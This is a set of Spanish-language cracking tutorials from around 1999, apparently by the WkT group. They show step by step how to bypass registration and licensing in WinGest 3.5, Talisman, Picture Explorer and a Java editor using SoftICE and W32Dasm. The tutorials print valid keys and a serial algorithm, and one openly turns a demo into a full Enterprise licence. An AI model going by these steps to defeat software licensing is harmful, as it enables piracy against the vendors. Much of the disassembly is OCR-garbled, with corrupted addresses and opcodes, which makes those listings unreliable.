¿Ya tienes puesto el bpx? :0) pulsamos ES en el Softlce para entrar en esa call e ir traceando el código 
(Pulsando F10). Si antes de cargar el Softlce te has pasado por esta call desde el Wdasm veras unas cosas muy 
interesantes. :0) Jejeje, el programador ha hecho una lista negra con los nombres de algunos de los mejores 
crackers, vaya... por ahi veo a mi amigo DASavant de [AnThraX] ;0) 


A lo que ibamos: si te fijas en el código anterior a la famosa lista negra verás que en :004796B 1 hay una call y 
justo despues un salto condicional que si lo seguimos.... nos saltamos toda la lista negra. Ummmmm, que 
cosas!! :0) 


Entraremos en esa Call a ver que se cuece. (Pon un breakpoint en el Softlce) 


:0047968B ESD4ASFSFF call 00403C64 

:00479690 8580 test eax, eax 

:00479692 OFSEOCO30000 jle 00479924 

:00479698 SD4DFC lea ecx, dword ptr [ebp-04] 
:0047969B 8B964C2B0500 mov edx, dword ptr [esi+00052B4C] 
:00479641 SBC6 mov eax, esi 

:00479643 ESGOB4FFFF call 00474B08 

:00479648 SB45FC mov eax, dword ptr [ebp-04] 
:0047964B SB96502B0500 mov edx, dword ptr [esi+00052B50] 
:004796B6 OFS5ES0Z20000 jne 00479924 

:004796BC 8B3864C2BO0500 mov eax, dword ptr [esi+00052B4C] 


* Possible StringData Ref from Data 0b3j ->"Jokhmy+X/C03'98!" 


Traceando traceando llegamos a :00403D7B 39D0 CMP EAX,EDX 


:00403D74 53 push ebx 
:00403D75 56 push esi 
:00403D76 57 push edi 
:00403D77 89C6 mov esi, eax 
:00403D79 89D? mov edi, edx 
:00403D7D 0FS48F000000 je 00403E12 
:00403D83 S85F6 test esi, ele 


uMMM, ¿y si miramos el contenido de esos dos registros? 
Escribimos "d edx" y obtenemos nuestro fake serial. 
Escribimos "d eax" y obtenemos nuestro verdadero serial. 


That's all Folks!! 


Me temo que pronto vereis a alguien más en esa lista negra. :0D 


Veamos donde guarda la información de registro. Porque el numero de serie seguramente lo guarde en alguna 
parte. Tras un monitoreo con el Regmonitor no vemos indicios de que utilice el Registro del Windows. Sin 
embargo, un minuto con el FileMonitor y descubriremos que Nuestro serial es almacenado en: Kyodai.ini 

A pelo!! ni encriptación ni historias. Total... ¿para que? Si tengo una lista negra en el programa de asustar. (Si, 
asustar asusta, la verdad). 


Una vez más nos topamos con otra absurda e inútil protección. Triste, pero real. :o( 
Hasta la próxima. Mr.WhiTe [WkT!] 


Creo que no hace falta que te recuerde el propósito de estos tutoriales. ¿no? 


NOTA: Estos tutoriales pueden contener errores intencionados (puede ser que el autor se haya saltado la 
explicación de algún paso, errores en las direcciones de memoria......etc). 
El objetivo es que aprendas a crackear y que tengas ideas propias. ;0) 
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Protección Restricciones y límite de uso hasta Septiembre '99. 
Dificultad 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
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Fecha 


07 de Julio de 1999 


Introducción 


Holas, en este tutorial voy a explicar el proceso que he seguido para crackear el WinGest v3.5. 

La versión que he crackeado, es una demostrativa que venía en la PC Actual (N236 J ulio/Agosto 99). 
En la página de 'Soft For You' -> http://www.sfy.con/demo.htm se puede descargar también la 
demo. 

Antes de nada, presentar el programa, funciones, precio...: 


VERSIONES DE WINGEST DISPONIBLES: 


WinGest 3 Standard .La versión Standard está pensada para empresas 
que no tienen necesidades muy complejas, pero necesitan una 
aplicación potente al precio más razonable. 


WinGest 3 Profesional. La Versión Profesional está dirigida a aquellas 
empresas que tienen necesidades de mayor envergadura, y que por ello 
precisan de un control y unas funciones específicas y más complejas. 
Para esta versión WinGest contempla una serie de módulos adicionales 
con los que cubrir completamente la gestión de áreas concretas de la 
actividad de la empresa. 


WinGest 3 Entreprise. La Versión Entreprise, más completa, incluye la 
Versión Profesional, 5 licencias adicionales y los Módulos de aplicación 


sobre WinGest. 
PROGRAMAS Versión 3.5 
WinGest 3.5 Standard 35.000.- 
WinGest 3.5 Profesional 120.000.- 


WinGest Enterprise - 5 Licencias Adicionales - 


Todos los Módulos Adicionales ya a la venta. 35000 


MÓDULOS ADICIONALES Versión 3.5 


Nuevo Módulo de CONTABILIDAD 25.000.- 
Módulo de Producción 50.000.- 
Módulo Terminal Punto de Venta 50.000.- 
Módulo Tallas y Colores 25.000.- 
Módulo R.M.A. 65.000.- 
Códigos Postales 5.000.- 
Módulo Remesas Bancarias y Gestión de pagos a 

proveedores 9000: 
ed Stock Por Lotes y Fecha 75.000.- 
Módulo de Comunicación 75.000.- 
Módulo Facturación Periódica 50.000.- 
LICENCIAS DE RED Versión 3.5 
Licencia para WinGest Standard 18.900.- 


Bueno, podemos observar que el precio es un poco exagerado... sobre todo si lo va a utilizar una 
pequeña empresa. 

En este crack vamos a 'convertir' la versión demostrativa del programa, en la versión Enterprise 
(350.000 pts) con todos los módulos adicionales y con 900 licencias de red (17.010.000 pts ;) ) 
Total: 17,4 millones de pelas. nada. 


Venga, vamos a divertirnos un poco xD. 


Al Atake 


Nada más ejecutar el programa, nos aparece una ventana donde podemos elegir registramos o 
entrar al programa en modo demostración. 


Elegimos registrarnos, que es lo que nos interesa. 
Nos abre otra ventana 'Asistente de registro', y nos pide los siguientes datos: 


- Nombre 
- Empresa 
- CIF 


Introducimos cualquier cosa y continuamos (no tiene ninguna importancia lo que pongamos... 
incluso podemos no poner nada). 

Ahora nos aparece otra ventana con más opciones, esta si que es importante, porque aquí le 
diremos al programa que versión es la que vamos a comprar (estandar, profesional, enterprise) y 
según eso nos dejará poner unos módulos u otros. 


El número de serie no tiene importancia... ponemos cualquier cosa. p. ej 'xasx!. 


Elegiremos la versión Enterprise, mejor que sobre que no que falte ;), todos los módulos se 
seleccionan automaticamente y vamos a poner también alguna licencia de red más... por ejemplo 
900 xD. (el máximo son 999). 


Ok, ahora con todo esto hecho, pulsamos siguiente y aparece un codigo de este estilo: 


6921-59610/3*33311111-900 


INININININININC. IN. ININININININ. INININ 


código variable -- est/pro/ent ----- módulos -- n2 licencias de red. 


Bueno, ya tenemos el código. 

Ahora se supone que tenemos que comunicar por fax o por teléfono este código a 'Soft for you', y 
despues de haber ingresado la pasta correspondiente a la versión que hallamos elegido, se nos dará 
un contra-código que introducimos en la siguiente ventana. 


Ya estamos en la ventana donde hay que introducir el 'contra-código". 
Aquí es donde empieza realmente el cracking. 
En Busca del 'contra-código' 


Introducimos un número al azar, y nos dice: ¡Lo Siento!, el contracódigo introducido está mal. 
¿Porqué se disculpa?, acaso es un juego... parece que sí. xD. 


Vamos a buscar el código del programa que llama a esta ventana. 
ohhh, W32DASM parece que no funciona muy bien con este programa... WINGEST.EXE ocupa 10,4 
Mb de 'basurilla' programada con VisualFoxPro 6.0. 


Parece que tendremos que utilizar Softl ce... más divertido todavia, xD. 


Despues de probar bastantes breakpoints sin éxito (típicos getdlgitemtext(a), getwindowtext(a)... 
etc etc), me doy cuenta que es un programa hecho en Visual Fox Pro 6.0, por lo que utilizará una 
libreria propia al estilo de Visual Basic. 


Asi es: VFP6R.DLL / Microsoft) Visual FoxPro6) Runtime Library. 


Ya estamos a punto de meternos a probar apis propias de esta libreria (bastante poco conocida en 
el cracking), pero antes de entrar de lleno... ¿porque no vamos primero a lo facil y hechamos un 
vistazo en la memoria por si acaso entre comparación y comparación se ha quedado algún numero 
interesante por hay? 


Rebuscando en la RAM 
El comando para buscar con Softl ce es: 


S = Search 
S0 | ffFFF “lo que quieras buscar” 


La busqueda la realizaremos despues de haber introducido un contra-código y pulsado |siguientel, 
porque ya se habrán hecho todas las comparaciones en memoria y podremos encontrar algún resto. 


Recordamos que nuestro código era: 6921-59610/3*33311111-900 (la primera parte es distinta 
cada vez). 


El mejor string para buscar que se me ocurre es: 3*33311111-900 : la parte final del código que nos 
da el programa y solo varía con los datos de registro. 


Entramos en softice (ctrl+d): 
Utilizamos la función de buscar...: s O | fEfFFF “3*33311111-900* 
y vamos pulsando <s> varias veces hasta que llegamos a algún lugar interesante. 


Despues de pulsar <s> unas 15 veces (pueden ser + o -), llegamos a un sitio, donde vemos lo 
siguiente: 

<<número desconocido 5 caracteres>>............ 610/3*33311111-900................ <<nuestro contra- 
código>>. 


(para movernos en la ventana de datos del softice, hay que pulsar alt+flecha arriba/abajo) 


hmmmmmmmm...... que hacen hay esos números tan juntos?... apuntaremos el n* de 5 caracteres 
en un papel y vamos otra vez al Wingest. 
Pulsamos en el botón |anterior| y volvemos a entrar a softice (ctrl+d), 


hmmmmmmmmmmm...... el n2 ya no está... y en su lugar pone: "enrerant". 
vamos a probar a escribir el 'n£ desconocido' que tenemos apuntado en la casilla de contra-código, 
a ver si por casualidad. ... 


XDDDD... Felicidades, ya tiene Wingest registrado, le deseamos un buen día. 


Bueno, parece que ha funcionado... y no nos hemos tenido que meter a tracear en el oscuro mundo 
de VFP6R.DLL / Microsoft) Visual FoxPro6) Runtime Library. 


Pulsamos finalizar y el programa carga normalmente, sin la palabra demostración en la ventana de 
inicio... 

Cerramos el Wingest y le volvemos a abrir. hmm carga correctamente y ya no sale ninguna ventana 
para que nos registremos, además funcionan todos los módulos y no hay restrinciones, ni caduca. 


Ahora buscamos donde se guarda la información de que está registrado: 


Lo puede hacer en varios lugares: 

Registro del Windows -> Comprobamos con 'regmon' si accede a alguna cadena propia. NO. 
Fichero .ini -> Comprobamos con "filemon' los ficheros .ini que consulta al cargar. 

Otro fichero propio -> Parece que va a ser esto... miramos los últimos ficheros modificados en el 
directorio del Wingest, y vemos que el CONT.DBF se ha modificado justo cuando registramos el 
programa. 

Miramos el fichero con un editor de texto y efectivamente, este es el fichero donde se guarda la 
información de que el programa está registrado. 

Si le borramos nos vuelve a salir la ventana de registro al arrancar, y si le volvemos a poner, el 
programa carga registrado. 


Bueno, ya está crackeado. 

No ha sido muy dificil, aunque hemos tenido suerte de no tener que tracear ni una sola línea de 
código, tal vez en la próxima versión el sistema de protección esté mejorado y nos tengamos que 
ver la cara con: VFP6R.DLL / Microsoft) Visual FoxPro Runtime Library... quien sabe. 


Hasta el próximo tutorial... 
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Introducción 


En este tutorial se vera como hacer una aproximacion a un programa hecho en 
visual basic con el depurador soft-ice, sin usar el Smartcheck (esto puede ser un 
poco lioso) . Lo primero de todo, tenemos que asegurarnos que en el fichero 
winice.dat tenemos la siguiente linea: 


exp=cwindowslsystemimsvbvm60.dll 


Sin esta linea, claro esta, no podriamos hacer nada. ;) 


Vi 


Al Atake 


Vamos a por el, y lo que hacemos despues de ejecutarlo, ver un menu donde 
pone REGISTER pulsamos sobre el y nos aparece lo que buscamos, un textbox 
donde nos pide la clave para poder registrarnos y en su lugar esta la cadena "Free 
Submission Wizard Only", tendremos que borrarla y poner nuestra clave favorita, en 
mi caso 'esiel2'. Pulsamos sobre el boton que pone 'Save Wizard Key' y nos sale el 
tipico mensaje diciendo que la clave no es correcta, tras esto, si nos fijamos 
detectamos que el programa automaticamente pone en mayusculas las dos primeras 
letras de mi password, ¡Que Raro!, solo las dos primeras, el resto lo deja en 
minusculas. Bueno, bueno, bueno, intentemos un aproximamiento un breakpoint 
¿Cual se os ocurre? ... ¡ VENGA!... ¿Ninguno? .... Pues el de casi siempre, 
rtcmsgbox, asi que escribimos nuestro clave otra vez 'esiel2' y pulsamos sobre el 
boton ... y zash ... volvemos al soft-ice despues de nuestro breakpoint, asi que como 
ya nos ha sacado el mensaje de error tendremos que subir hacia arriba para encontrar 
donde toma la decision de que nuestra clave sea correcta o incorrecta, y nos 
encontramos con la siguientes intrucciones: 


0137:0048E79E add esp,38 
0137:0048E7A1 test di,di 


0137:0048E7A4 j3z 0048E88F <--- Aqui toma la 
decision 

0137:0048E7AA mov edi, [US VBVM60! _ vbastrcat] si sacar el error o 
no 

0137:0048E7B0 push 00442038 dependiendo del 
flag 'z' 


creo que sabeis al 
que 
me refiero ;) 


Pero, resulta que si cambiamos el flag, nos sale el mensaje de que estamos 
registrados pero cuando queremos registrarnos en mas de 17 buscadores nos dice 
que no puede ser, ¿como es eso?, ¿no estabamos ya registrado?, ... pues no. Pues 
entonces, tendremos que hacerlo mas fino y buscar una clave que sea realmente 
valida para ello, asi que si nos acordamos del principio en donde vimos que el 
programa cogia las dos primeras letras y las convertia en mayusculas, asi que si 
buscamos un breakpoint o bien coja caracteres a la izquierda de la cadena o bien 
tranforme caracteres en mayusculas, con lo que si nos miramos el tutorial sobre 
Crackeando en Visual Basic podemos ver ambos breakpoint, los cuales son los 
siguientes: 


rtcLeftCharBstr 
rtcUpperCaseBstr 


Probamos con el primer breakpoint, volvemos al programa y pulsamos sobre 
el boton e inmediatamente regresamos de nuevo al Soft-ice en las siguientes lineas: 


0137:0048E512 push edx 

0137:0048E513 call [MSVBVM60!rtcLeftCharBstr]  <--- Coge caracteres a la 
izda. 

0137:0048E519 mov edx,eax 


0137:0048E51B 
0137:0048E51E 


lea ecx, [ebp-1c] 
call esi 


En estas lineas se coge los dos primeros caracteres de mi clave introducida, 
que fue 'esiel2", pues se coge 'es'. Y despues sigue con: 


0137:0048E520 
0137:0048E521 
en 'ES' 

0137:0048E527 
0137:0048E529 
0137:0048E52C 
0137:0048E52E 
0137:0048E52F 


0137:0048E54A 
0137:0048E54B 
0137:0048E34C 
dcha. 
0137:0048E352 
0137:0048E5354 
0137:0048E557 
0137:0048E559 
0137:0048E535A 
anteriores 
0137:0048E360 
minusculas. 
0137:0048E5362 
0137:0048E565 


push eax 

call [MSVBVM60!rtcUpperCaseBstr]  <--- Aqui convierte 'es' 
mov edx,eax 

lea ecx, [ebp-24] 

call esi 

push eax 

mov eax, [005112E8] 


push eax 

push ecx 

call [MSVBVMO6O0!rtcRightCharBstr] <--- Coge caracteres a la 
mov edx, eax '1el2”. 

lea ecx, [ebp-20] 

call esi 

push eax 

call [MSVBVM60!rtcLowerCaseBstr] <--- Convierte los 
mov edx,eax caracteres en 
lea ecx, [ebp-28] 

call esi 


Y asi pulsando la tecla F10 hasta que nos encontramos algo 


interesante 


como lo que viene ahora. 


0137:0048E6C7 
0137:0048E6C9 
0137:0048E6CA 
caracteres 
0137:0048E6DO0 
clave. 
0137:0048E6D2 
0137:0048E6D53 
0137:0048E6D7 
comparar 


puede 


0137:0048E6DD 
programa 


push 02 
push edx 


call [MSVBVM60!'rtcLeftCharBstr]  <--- Coge de nuevo 2 


mov edx,eax a la izquierda de mi 
lea ecx, [ebp-38] 

call esi 

mov ebx, [HSVBVM60! _vbaStremp] <--- ¡Funcion para 


cadenas!! ¿para que 


servir esta funcion? jeje 


push eax <--- Se guarda lo que realmente le interesa al 


de mi clave que son las dos primeras letras 


en 


0137:0048E6DE 


4420EC 


mayusculas 'ES' 
push 004420EC  <--- Es la direccion donde se guarda la clave 
correcta. Podemos verla poniendo: D 


Y nos daria como resultado 'PW' 


* En estos 2 ultimos push se guarda las dos cadenas que ha comparado la funcion 


api 


— vbastrcmp. 


Seguimos observando el programa, puesto que como sabemos donde 
.... toma la decision de decirnos si somos buenos o somos malos pues tendremos 


que 


.... tracearlo un pokito y de camino viendo lo que va sucediendo. 


0137:0048E6EE 
0137:0048E6FO 
0137:0048E6F2 
0137:0048E6F3 
0137:0048E6F5 
0137:0048E6FB 
0137:0048E6FD 
0137:0048E600 
0137:0048E602 
las dos 


CES) 
0137:0048E603 


push 02 

neg edi 

push eax 

neg edi 

call [MSVBVM060!'rtcLeftCharBstr] 
mov edx,eax 

mov ecx, [ebp-30] 


call esi <--- Hace referencia al api __ vbastrecmp 

push eax <--- ¡¡ Curioso ¡¡ Se vuelve a guardar de nuevo 
primeras letras de mi clave y en mayusculas 

push 004420E0  <--- Es la direccion donde se guarda otra clave 


correcta!!!! en este caso es: 'EW' 


Avanzamos un pokito y nos encontramos otra vez con esto. 


0137:0048E61A 
0137:0048E620 

0137:0048E622 

0137:0048E625 

0137:0048E627 

clave 


0137:0048E628 


0137:0048E63F 
0137:0048E645 

0137:0048E647 

0137:0048E64A 
0137:0048E64C 
clave 


0137:0048E64D 


call [MSVBVM060!rtcLeftCharBstr] 
mov edx,eax 
mov ecx, [ebp-28] 


call esi <--- Hace referencia al api __ vbastremp 

push eax <--- Vuelve a guardar las 2 primeras letras de mi 
en mayusculas('ES”). 

push 004420D4  <--- Otra clave correcta, en este caso es: 'DN". 


call [MSVBVM060!'rtcLeftCharBstr] 
mov edx,eax 
mov ecx, [ebp-20] 


call esi <--- Hace referencia al api __ vbastremp 

push eax <--- Vuelve a guardar las 2 primeras letras de mi 
en mayusculas (ES”). 

push 004410C8  <--- Otra clave correcta, en este caso es: 'KX' 


" 


Seguimos trazando el programa en busca de nuestro " jz 0048E88F 
Hasta que lo encontramos. 


Ahora procedemos a probar una de las multiples claves correctas que hemos 
encontrado, pero tenemos una sorpresa y es que cuando pulsamos sobre el boton 
para comprobar pues nos sigue dando un error, asi que pensemos un poko .... 
seguramente algo se nos habra pasado por alto, pero la funcion de comparacion 
tomaba dos caracteres de mi cadena y devolvia dos caracteres como 'validos', y 
ademas el programa solo convierte a mayusculas las 2 primeras de mi clave ..... 
Umm .... UUMMMM.... y SI COgemos y ponemos en el textbox la palabra clave+(4 o 
5 espacios en blancos)... pues FUNCIONA, luego hemos crackeado este programa 
sin necesidad del Smartcheck. Resumiendo las posibles claves validas son: 


PW"_ esiel2 
EW-esiel2 
DN-otra_vez-soy-yo-(esiel2) 
KX-;0) 
DNEWPWKX 


Y asi todos las que quieras, esto es todo, hasta la proxima ..... Un Saludo. ;) 


- 
VOM 
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Introducción 


El programa no tiene limitaciones por no estar registrado, pero aparece una nag-screen 
cada vez que se arranca el programa. Hay una opción para registrarse, introduciendo el 
nombre y la clave. El objetivo será obtener nuestro número de serie correcto y 
comprender mejor el funcionamiento de la función HAMEMCPY. 


hd 


Al Atake 


Lo primero es ver cómo reacciona el programa al intentar registrarnos. 
Ponemos un nombre, y clave cualquiera, y nos aparece un mensaje de clave incorrecta. 
"Invalide registration name or code. Try again." 


Podriamos utilizar el "death listing" o listado muerto y bucear en el código una vez desensamblado con el Wdasm 8.9, 
pero lo mejor será practicar un poco con el Softlce. :0) 


Así pues, cargamos el Talisman y nos disponemos a introducir nuestro nombre y un numero de serie cualquiera. 
Vamos al SoftIce(Ctrl+D) ¿ponemos el breakpoint(BPX HMEMCPY) y volvemos al programa(Ctrl+D), ahora 
pulsamos el boton " Register! " y aparecemos en el Softlce. 

Como teniamos dos campos a rellenar (nombre y serial) ahora nos encontramos en el primero, pulsamos Fl 1 (o 
Ctrl+D, es lo mismo) con lo cual el Softice nos pega otro pantallazo :0) 

Ahora si, estamos en el buen camino. ;0) 


Desactivamos el breakpoint (BD 00) y pulsamos F12 unas cuantas veces hasta llegar al código del Talisman. 
Traceamos un rato (F10) hasta alcanzar el siguiente fragmento de código: 


:0047FC88 E8E73FF8FE call 00403C74 

:0047FC8D 85C0 test eax, eax 

:0047FC8F 7E13 jle 0047FCA4 

:0047FC91 BAO1000000 mov edx, 00000001 ¡Empieza con el primer caracter 

:0047FC96 8B4DF8 mov ecx, dword ptr [ebp-08] 

:0047FC99 0FB64C11FF MOVZX ecx, byte ptr [ecxtedx-01] ¡Mueve el codigo del caracter a ECX 
:0047FC9E 03F1 add esi, ecx ¿Va sumando los codigos 

:0047FCAO 42 inc edx ¡Prepara el siguiente caracter 

:0047FCA1l 48 dec eax ¡Decrementa el numero de caracteres que quedan 
:0047FCA2 75F2 jne 0047FC96 ¿Ultimo caracter? 


Este es el comienzo del código que se utiliza para calcular nuestro número de serie. 
Se pasan los caracteres ASCII del nombre a su correspondiente valor hexa y se van sumando. Si seguimos traceando (F10) llegamos al 
siguiente punto: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0047FC8F (C) 


:0047FCAZ 8975EC mov dword ptr [ebp-14], esi 

:0047FCA7 DB45E fild dword ptr [ebp-14] 

:0047FCAA E8C52CF8FF call 00402974 

:0047FCAF 69C009030000 imul eax, 00000309 ¿Multiplica la suma por 309 
:0047FCB5 8BFO mov esi, eax 

:0047FCB7 3B75FC cmp esi, dword ptr [ebp-04] ¡Compara serial real con el nuestro 
:0047FCBA 0F85BF000000 jne 0047FD7F ¡Salta si "mal cracker" 
:0047FCCO B201 mov dl, 01 ¿Activa el Flag de REGISTRADO 
:0047FCC2 A1E0D54700 mov eax, dword ptr [0047D5E0] 

:0047FCC7 E810DAFFFF call 0047D6DC 

:0047FCCC B8BFO mov esi, eax 

:0047FCCE B101 mov. cl, 01 


* Possible StringData Ref from Code Obj ->"Invalide registration name or " 
=>"code. Try again." 


:0047FD7F B830FE4700 mov eax, 0047FE30 
:0047FD84 E80BOCFCFE call 00440994 


Como puede observarse, en este fragmento de código se multiplica la suma obtenida anteriormente por 309, y el valor se guarda en esi para 
su posterior comprobacion en :0047FCB7. 


Si nos situamos en esta línea " :0047FCB7 3B75FC cmp esi, dword ptr [ebp-04] " y escribimos en el Softlce " ? esi " obtendremos nuestro 
ansiado número de serie. 

Facil ¿verdad? ;0) 

Puesto que el algoritmo empleado es sumamente sencillo, se deja como ejercicio al lector crear un generador de numeros de serie. 


ke *=*=*=* PERSONAL GREBETZ **-*-* Er 
Dasavant, Niabi, r00ster, ZEncrakz, Azrael, Klimpong, Zor 
Conde-Vampiro, Mac-Crack, Killer_P, ASTAGA, Harvestr, Iczelion 
JosephCo, Carpathia, Taylor, Tapu, Ivanopulo, EgoistE, Torntdo, 
JUANDA, Leoworld, ReKiem, Neural_N, Netking, Russ97, 
Mr.Pink and of course all WKT Members ¡;o) 


|WHISKEY KON TEKILA| 
[Mr .whiTe [WkT!99] | 
|http://wkt.tsx.orgl 
|http://ecd.tsx.org] 


* = * 
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DiFiCultAD DiFiCultAD 


| programA [Picture Explorer 1.2.1 W9S5 
A [AA a O ($26) 
a ra 


aran NagSrer Nag-Screen 

DEC aAD Amate 2) AMA 

hErrAmiEntAs W32Dasm 

FECHA [Diciembre 19987 Dm 1998 

| ComEntArio [Administrador de ficheros gráficos. 


Introducción 


El objetivo sera encontrar el numero de registro real del programa. 


Al Atake 


Cuando arrancamos el Picture Explorer, nos sale directamente una Nag-Sereen recordandonos que 
estamos en una version Shareware y dandonos opcion a registrarla o escribir un Password que el nos da 
para trabajar en modo Shareware. 

Este Password que el nos da, y que sale en las lineas que hay encima de donde pide los campos, varia 
cada vez que arrancamos el programa. 


Si intentamos registrar el programa, vemos que nos pide tres campos: 


User Name: Mr.Grey 
Organization: Mr.Grey 
Password: 30071996 


pero si nos fijamos, el boton de Siguiente > esta desactivado hasta que se introduzca un Password 
correcto. 
En este momento, introduciremos el Password que el nos da y que es de 5 caracteres. 


Una vez introducido, el boton de Siguiente > se convierte en el boton Finalizar y esta activado, pulsar 
este boton y entraremos en el programa. 


Si miramos en el menu Help / About Picture Explorer... veremos que como registro, nos sale No 
register en lugar de lo que pusimos nosotros en la pantalla de registro. 
Esto nos servira para atacar la proteccion del programa desde el W32Dasm. 


Arrancar el W32Dasm y abrir una copia del fichero Picexpl.exe, una vez desensamblado, salvarlo para 
no tener que volverlo a hacer. 


Ir al menu Refs / String Data References y buscar la frase No register, una vez encontrada, hacer 
doble click sobre ella para situarnos en la parte de codigo que corresponda: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004011DF (C) 


* Possible StringData Ref from Data Obj ->"No Register" 
| 

:0040125A BE74A14A00 mov esi, 004AA174 

:0040125F 8D4F5C lea ecx, dword ptr [edi+5C] 

:00401262 56 push esi 

:00401263 E864C40500 call 0045D6CC 

:00401268 56 push esi 

:00401269 8D8F98000000 lea ecx, dword ptr [edi+00000098] 
:0040126F E858C40500 call 0045D6CC 


Vemos que aqui se viene por un salto condicional en la linea :004011DF, luego esto quiere decir que en 
esa parte de codigo debe estar la verificacion de si se esta registrado o no, veamos esta parte de codigo: 


:00401174 33DB xor ebx, ebx 

:00401176 3C79 cmp al, 79 <-- Interesante 

:00401178 0F95C3 setne bl 

:0040117B 33C0 xor eax, eax 

:0040117D 80FA58 cmp dl, 58 <-— Interesante 

:00401180 OF95C0 setne al 

:00401183 03D8 add ebx, eax 

:00401185 33C0 xor eax, eax 

:00401187 807DF365 cmp byte ptr [ebp-0D], 65 <--— Interesante 
:0040118B OF95C0 setne al 

:0040118E 03D8 add ebx, eax 

:00401190 33C0 xor eax, eax 

:00401192 807DF273 cmp byte ptr [ebp-0E], 73 <-- Interesante 
:00401196 OF95C0 setne al 

:00401199 03D8 add ebx, eax 

:0040119B 33C0 xor eax, eax 

:0040119D 807DF178 cmp byte ptr [ebp-0F], 78 <-- Interesante 
:004011A1 OF95C0 setne al 

:004011A4 03D8 add ebx, eax 

:004011A6 33C0 xor eax, eax 

:004011A8 807DF078 cmp byte ptr [ebp-10], 78 <-- Interesante 
:004011AC OF95C0 setne al 

:004011AF 03D8 add ebx, eax 

:004011B1 33C0 xor eax, eax 

:004011B3 807DEF37 cmp byte ptr [ebp-11], 37 <-- Interesante 
:004011B7 OF95C0 setne al 

:004011BA 03D8 add ebx, eax 

:004011BC 33C0 xor eax, eax 

:004011BE 80F978 cmp cl, 78 <-—- Interesante 

:004011C1 OF95C0 setne al 

:004011C4 03D8 add ebx, eax 

:004011C6 33C0 xor eax, eax 

:004011C8 807DEE36 cmp byte ptr [ebp-12], 36 <-- Interesante 
:004011CcC OF95C0O setne al 

:004011CF 03D8 add ebx, eax 


:004011D1 33C0 xor eax, eax 

:004011D3 807DED35 cmp byte ptr [ebp-13], 35 <-- Interesante 
:004011D7 OF95C0 setne al 

:004011DA 03D8 add ebx, eax 

:004011DC 895DE0 mov dword ptr [ebp-20], ebx 

:004011DF 7579 jne 0040125A <-—- No registrado 


:004011E1 CC int 03 
:004011E2 C3 ret 


Poner atencion a las lineas anteriores al salto a la rutina de error, en las comparaciones o CMPs que hay 
sobre valores fijos y que en total son 10. 
estas comparaciones son: 


¡AL DL ¡EBP-D EBP-E ¡EBP-F |¡EBP-10 ¡EBP-11 ¡CL EBP-12 ¡[EBP-13 
¡Hexadecimal [79 [58 | 65 | 73 | 78 78 37 [78 | 36 35 
¡ASCH ly [x[ e x x 7 [|x| 6 5 
Como se puede suponer, este es el Password de registro real y que ademas es siempre el mismo. 


Mirando unas lineas mas arriba de donde empieza la rutina de comprobacion, podemos ver como hay 
que colocar el Password para que coincida luego con la comprobacion: 


:00401142 8A5001 mov dl, byte ptr [eax+01] 
:00401145 8A08 mov cl, byte ptr [eax] <-- 1 caracter 

:00401147 8855ED mov byte ptr [ebp-13], dl <-- 2 caracter 
:0040114A 8A5002 mov dl, byte ptr [eax+02] 
:0040114D 8855F0 mov byte ptr [ebp-10], dl <-- 3 caracter 
:00401150 8A5003 mov dl, byte ptr [eax+03] 
:00401153 8855EE mov byte ptr [ebp-12], dl <-- 4 caracter 
:00401156 8A5004 mov dl, byte ptr [eax+04] 
:00401159 8855F1 mov byte ptr [ebp-0F], dl <-- 5 caracter 
:0040115C 8A5005 mov dl, byte ptr [eax+05] 
:0040115F 8855EF mov byte ptr [ebp-11], dl <-- 6 caracter 
:00401162 8A5006 mov dl, byte ptr [eax+06] 
:00401165 8855F2 mov byte ptr [ebp-0E], dl <-- “7 caracter 
:00401168 8A5007 mov dl, byte ptr [eax+07] 
:0040116B 8855F3 mov byte ptr [ebp-0D], dl <-- 8 caracter 
:0040116E 8A5008 mov byte ptr [eax+08] <-—- 9 caracter 
:00401171 8A4009 mov byte ptr [eax+09]<-- 10 caracter 


ss 


H 
sa 


voces. ccocoecoo 


H 
sa 


Partimos de la base de que en el registro EAX esta el Password correcto y haciendo un seguimiento de 
los movimientos, obtenemos el siguiente resultado: 


e S 


E 
— 
Exe 


Ahora ya tenemos el Password correcto. 
Solo nos queda volver a ejecutar el programa y rellenar los campos de la siguiente manera: 


User Name: Mr.Grey 
Organization: Mr.Grey 


Password: x5x6x7seX y 


Tener en cuenta que como la clave es unica, en los campos de User Name y Organization, se puede 
poner lo que se quiera. 
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| CrACkEr  ¡|Mr.Grey 
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| ComEntArio [Editor para programar en JAVA 


Introducción 


El objetivo sera encontrar el numero de registro real del programa. 


Al Atake 


Ir a la pantalla d registro que esta situada en el menu Help / Register... 
donde se pediran los campos: 


Key: Mr.Grey 
Code: 30071996 


Pulsar CTRL+D para entrar en el Softlce y poner un BreakPoint asi: 
bpx MessageBoxA 
y pulsar la tecla F5 para volver al programa. 


Pulsar el boton OK y apareceremos en el Softlce. 
Pulsar la tecla F12 y volveremos al programa en donde veremos una 
ventana con el mensaje de que el codigo es erroneo. 


Pulsar el boton Aceptar y volveremos a aparecer en el SoftIce. 
Pulsar F12 y F12 para situarnos en el codigo perteneciente al 
programa que estamos ejecutando con el siguiente codigo: 


:00428941 51 push ecx <-—- Mirar esto 
:00428942 52 push edx <-— Mirar esto 
:00428943 FFD3 call ebx <-- Rutina de 
comprobacion 

:00428945 83C408 add esp, 00000008 
:00428948 F7D8 neg eax 

:0042894A 1BC0 sbb eax, eax 

:0042894C F7D8 neg eax 

:0042894E 84C0 test al, al 

:00428950 7410 Je 00428962 <-- Registrado 
:00428952 6A00 push 00000000 
:00428954 6440 push 00000040 


* Possible StringData Ref from Data Ob] -— 
>"Invalid Key or Registration ID. " 


>"Please try again." 


:00428956 687CB34D00 push 004DB37C 


* Reference To: MFC42.MFC42:NoName0022, 
Ord:04B0h 


:0042895B E8A6E60600 Call 00497006 
:00428960 EB68 jmp 004289CA <-—- Aparecemos aqui 


Si miramos el codigo que hay unas lineas mas arriba de donde 
aparecemos, vemos que en la linea :00428950 hay un salto condicional 
que se salta el mensaje de error. 


Este salto, viene dado del resultado del TEST AL, AL anterior y que 
es calculado en la llamada que hay en la linea :00428943. 
Pondremos un BreakPoint en la linea :00428943 que es en donde se 
hace una llamada a la rutina de comprobacion y quitaremos el 
BreakPoint anterior: 


bpx 00428943 
bc 00 


Pulsar la tecla F5 para volver al programa y pedir la pantalla de 
registro otra vez poniendo los mismos valores que la vez anterior y 
pulsar el boton OK. 


